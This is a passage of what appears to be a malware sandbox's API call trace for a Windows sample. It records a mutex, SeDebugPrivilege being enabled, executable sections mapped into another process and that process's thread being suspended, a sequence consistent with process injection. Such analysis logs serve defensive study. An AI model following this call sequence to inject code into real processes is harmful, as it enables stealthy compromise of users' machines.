IoStatusBlock=0x19f1f4, FileInformation=0x19f14c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f1f4, FileInformation=0x19f14c) returned 0x0 [0175.550] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1788a0) returned 0x584020 [0175.588] NtReadFile (in: FileHandle=0x6c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f1f4, Buffer=0x584020, BufferLength=0x1784a0, ByteOffset=0x19f164*=0, Key=0x0 | out: IoStatusBlock=0x19f1f4, Buffer=0x584020*) returned 0x0 [0175.637] NtClose (Handle=0x6c) returned 0x0 [0175.637] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x17b001) returned 0x842020 [0175.680] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x584020) returned 1 [0175.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f1e0*=0x0, ZeroBits=0x0, RegionSize=0x19f1e4*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19f1e0*=0x9c0000, RegionSize=0x19f1e4*=0x2fa000) returned 0x0 [0175.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x743388 [0175.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x744390 [0175.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x745398 [0175.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x7463a0 [0175.783] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x745398) returned 1 [0175.783] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x7483a8 [0175.784] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7463a0) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x74b3b0 [0175.785] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7483a8) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x745398 [0175.786] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74b3b0) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x74a3a0 [0175.786] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x74b3a8 [0175.786] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a3a0) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x74d3b0 [0175.786] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74b3a8) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x7503b8 [0175.787] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74d3b0) returned 1 [0175.787] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x74a3a0 [0175.788] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7503b8) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x74f3a8 [0175.788] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x7503b0 [0175.788] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74f3a8) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x7523b8 [0175.788] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7503b0) returned 1 [0175.788] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x7553c0 [0175.789] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7523b8) returned 1 [0175.789] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x74f3a8 [0175.789] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7553c0) returned 1 [0175.790] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x743388) returned 1 [0175.790] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x744390) returned 1 [0175.797] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x745398) returned 1 [0175.797] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a3a0) returned 1 [0175.798] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74f3a8) returned 1 [0175.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x743388 [0175.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x744390 [0175.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x745398 [0175.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x7463a0 [0175.829] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x745398) returned 1 [0175.829] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x7483a8 [0175.831] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7463a0) returned 1 [0175.831] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x74b3b0 [0175.832] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7483a8) returned 1 [0175.833] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x745398 [0175.834] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74b3b0) returned 1 [0175.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x74a3a0 [0175.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x74b3a8 [0175.835] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a3a0) returned 1 [0175.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x74d3b0 [0175.837] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74b3a8) returned 1 [0175.839] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x7503b8 [0175.840] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74d3b0) returned 1 [0175.840] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x74a3a0 [0175.841] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7503b8) returned 1 [0175.841] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1000) returned 0x74f3a8 [0175.841] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x7503b0 [0175.842] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74f3a8) returned 1 [0175.842] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3000) returned 0x7523b8 [0175.842] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7503b0) returned 1 [0175.842] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4000) returned 0x7553c0 [0175.843] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7523b8) returned 1 [0175.843] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5000) returned 0x74f3a8 [0175.843] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7553c0) returned 1 [0175.844] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x743388) returned 1 [0175.844] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x744390) returned 1 [0175.845] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x745398) returned 1 [0175.845] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a3a0) returned 1 [0175.845] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74f3a8) returned 1 [0175.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f18c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.846] NtCreateFile (in: FileHandle=0x19f1ac, DesiredAccess=0x120089, ObjectAttributes=0x19f174*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f194, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f1ac*=0x6c, IoStatusBlock=0x19f194*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0175.846] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7427b0) returned 1 [0175.846] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f194, FileInformation=0x19ef08, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f194, FileInformation=0x19ef08) returned 0x0 [0175.846] NtClose (Handle=0x6c) returned 0x0 [0175.847] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x743388 [0175.847] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x743388) returned 1 [0175.852] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x6ff411d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f1c8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f1c8*(BaseAddress=0x6ff41000, AllocationBase=0x6ff40000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0176.300] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f220, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f220, ResultLength=0x0) returned 0x0 [0176.324] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f244, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f244, ReturnLength=0x0) returned 0x0 [0176.366] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x842020) returned 1 [0176.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eed4*=0x0, ZeroBits=0x0, RegionSize=0x19eed8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eed4*=0x20000, RegionSize=0x19eed8*=0x10000) returned 0x0 [0176.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0176.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19eef8, FreeType=0x8000) returned 0x0 [0176.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eec0*=0x0, ZeroBits=0x0, RegionSize=0x19eec4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eec0*=0x20000, RegionSize=0x19eec4*=0x20000) returned 0x0 [0176.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0176.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19f238, FreeType=0x8000) returned 0x0 [0176.481] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eff0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0176.482] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x19f060 | out: BaseAddress=0x19f060*=0x750b0000) returned 0x0 [0176.518] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f24c | out: TokenHandle=0x19f24c*=0x80) returned 0x0 [0176.523] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f240 | out: lpLuid=0x19f240*(LowPart=0x14, HighPart=0)) returned 1 [0176.539] NtAdjustPrivilegesToken (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x19f23c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0176.542] NtClose (Handle=0x80) returned 0x0 [0176.543] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eb80 | out: Value="RDhJ0CNFevzX") returned 0x0 [0176.546] NtOpenDirectoryObject (in: FileHandle=0x19f040, DesiredAccess=0x2000f, ObjectAttributes=0x19f00c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0x19f040*=0x80) returned 0x0 [0176.549] NtCreateMutant (in: MutantHandle=0x19f26c, DesiredAccess=0x1f0001, ObjectAttributes=0x19eff4*(Length=0x18, RootDirectory=0x80, ObjectName="0M1P2-24V-8B9WJ_", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0x19f26c*=0xbc) returned 0x0 [0176.549] NtClose (Handle=0x80) returned 0x0 [0176.549] NtClose (Handle=0xbc) returned 0x0 [0176.549] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e604 | out: Value="RDhJ0CNFevzX") returned 0x0 [0176.562] RtlSetEnvironmentVariable (in: Environment=0x0, Name="0M1P2-24", Value="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" | out: Environment=0x0) returned 0x0 [0176.565] NtCreateSection (in: SectionHandle=0x19ed18, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ed18*=0xbc) returned 0x0 [0176.569] NtMapViewOfSection (in: SectionHandle=0xbc, ProcessHandle=0xffffffff, BaseAddress=0x19ed1c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x28c00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed1c*=0x4f0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x29000) returned 0x0 [0176.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, RegionSize=0x19e424*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e420*=0x30000, RegionSize=0x19e424*=0x10000) returned 0x0 [0176.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x30000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x30000, ResultLength=0x0) returned 0xc0000004 [0176.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x30000, RegionSize=0x19e444, FreeType=0x8000) returned 0x0 [0176.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e40c*=0x0, ZeroBits=0x0, RegionSize=0x19e410*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e40c*=0x520000, RegionSize=0x19e410*=0x20000) returned 0x0 [0176.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x520000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x520000, ResultLength=0x0) returned 0x0 [0176.585] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x5d0, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x80) returned 0x0 [0176.585] NtQueryInformationProcess (in: ProcessHandle=0x80, ProcessInformationClass=0x1a, ProcessInformation=0x19e780, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19e780, ReturnLength=0x0) returned 0x0 [0176.585] NtCreateSection (in: SectionHandle=0x19e41c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e3dc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e41c*=0xc0) returned 0x0 [0176.585] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0x19e424*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e3dc*=0x11ac00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e424*=0xcc0000, SectionOffset=0x0, ViewSize=0x19e3dc*=0x11b000) returned 0x0 [0176.595] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0x80, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e418*=0x11ac00, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e420*=0x8d90000, SectionOffset=0x0, ViewSize=0x19e418*=0x11b000) returned 0x0 [0177.908] NtClose (Handle=0xc0) returned 0x0 [0177.929] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x2000) returned 0x74a8e8 [0177.947] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e0e8 | out: TokenHandle=0x19e0e8*=0xc0) returned 0x0 [0177.951] NtQueryInformationToken (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x19d8e0, TokenInformationLength=0x400, ReturnLength=0x19e0e0 | out: TokenInformation=0x19d8e0, ReturnLength=0x19e0e0) returned 0x0 [0177.952] ConvertSidToStringSidW (in: Sid=0x19d8e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19e0e4 | out: StringSid=0x19e0e4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0177.952] NtClose (Handle=0xc0) returned 0x0 [0177.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x0, ZeroBits=0x0, RegionSize=0x19e35c*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e358*=0x680000, RegionSize=0x19e35c*=0x11000) returned 0x0 [0177.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e344*=0x0, ZeroBits=0x0, RegionSize=0x19e348*=0x10636, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e344*=0x6a0000, RegionSize=0x19e348*=0x11000) returned 0x0 [0177.960] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x41d5b6, NumberOfBytesToProtect=0x19e35c, NewAccessProtection=0x40, OldAccessProtection=0x19e3a4 | out: BaseAddress=0x19e358*=0x41d000, NumberOfBytesToProtect=0x19e35c, OldAccessProtection=0x19e3a4*=0x20) returned 0x0 [0177.961] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x74a8e8) returned 1 [0177.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19e150, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.970] NtCreateFile (in: FileHandle=0x19e170, DesiredAccess=0x120089, ObjectAttributes=0x19e138*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e158, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e170*=0xc0, IoStatusBlock=0x19e158*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0177.970] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x746518) returned 1 [0177.974] NtQueryInformationFile (in: FileHandle=0xc0, IoStatusBlock=0x19e158, FileInformation=0x19decc, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e158, FileInformation=0x19decc) returned 0x0 [0177.974] NtClose (Handle=0xc0) returned 0x0 [0177.974] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x7405c8 [0177.974] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x7405c8) returned 1 [0177.982] NtOpenProcess (in: ProcessHandle=0x19e358, DesiredAccess=0x438, ObjectAttributes=0x19d908*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19d948*(UniqueProcess=0x5d0, UniqueThread=0x0) | out: ProcessHandle=0x19e358*=0xc0) returned 0x0 [0177.986] NtQueryInformationProcess (in: ProcessHandle=0xc0, ProcessInformationClass=0x0, ProcessInformation=0x19d958, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19d958, ReturnLength=0x0) returned 0x0 [0177.992] NtOpenThread (in: ThreadHandle=0x19d900, DesiredAccess=0x1a, ObjectAttributes=0x19d908, ClientId=0x19d938*(UniqueProcess=0x0, UniqueThread=0x5d4) | out: ThreadHandle=0x19d900*=0xc4) returned 0x0 [0178.010] NtSuspendThread (in: ThreadHandle=0xc4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0178.016] NtGetContextThread (in: ThreadHandle=0xc4, Context=0x19de50 | out: Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd0, [65]=0x1c, [66]=0x22, [67]=0x5f, [68]=0xfb, [69]=0x7f, [70]=0x0, [71]=0x0, [72]=0xb0, [73]=0x40, [74]=0xf, [75]=0x5f, [76]=0xfb, [77]=0x7f, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x6133d0, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x600000, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0xff000000, ExtendedRegisters=([0]=0xff, [1]=0xf, [2]=0x0, [3]=0x0, [4]=0x20, [5]=0xf3, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x9d, [23]=0x5f, [24]=0xfb, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0xa0, [29]=0xa, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0x33, [39]=0x5f, [40]=0xfb, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0x34, [45]=0x20, [46]=0xb4, [47]=0x60, [48]=0xfb, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x3e, [213]=0xf, [214]=0xe9, [215]=0x41, [216]=0xc1, [217]=0x56, [218]=0x33, [219]=0x46, [220]=0x81, [221]=0xc3, [222]=0x6e, [223]=0x8b, [224]=0xac, [225]=0x8b, [226]=0xdd, [227]=0x70, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, 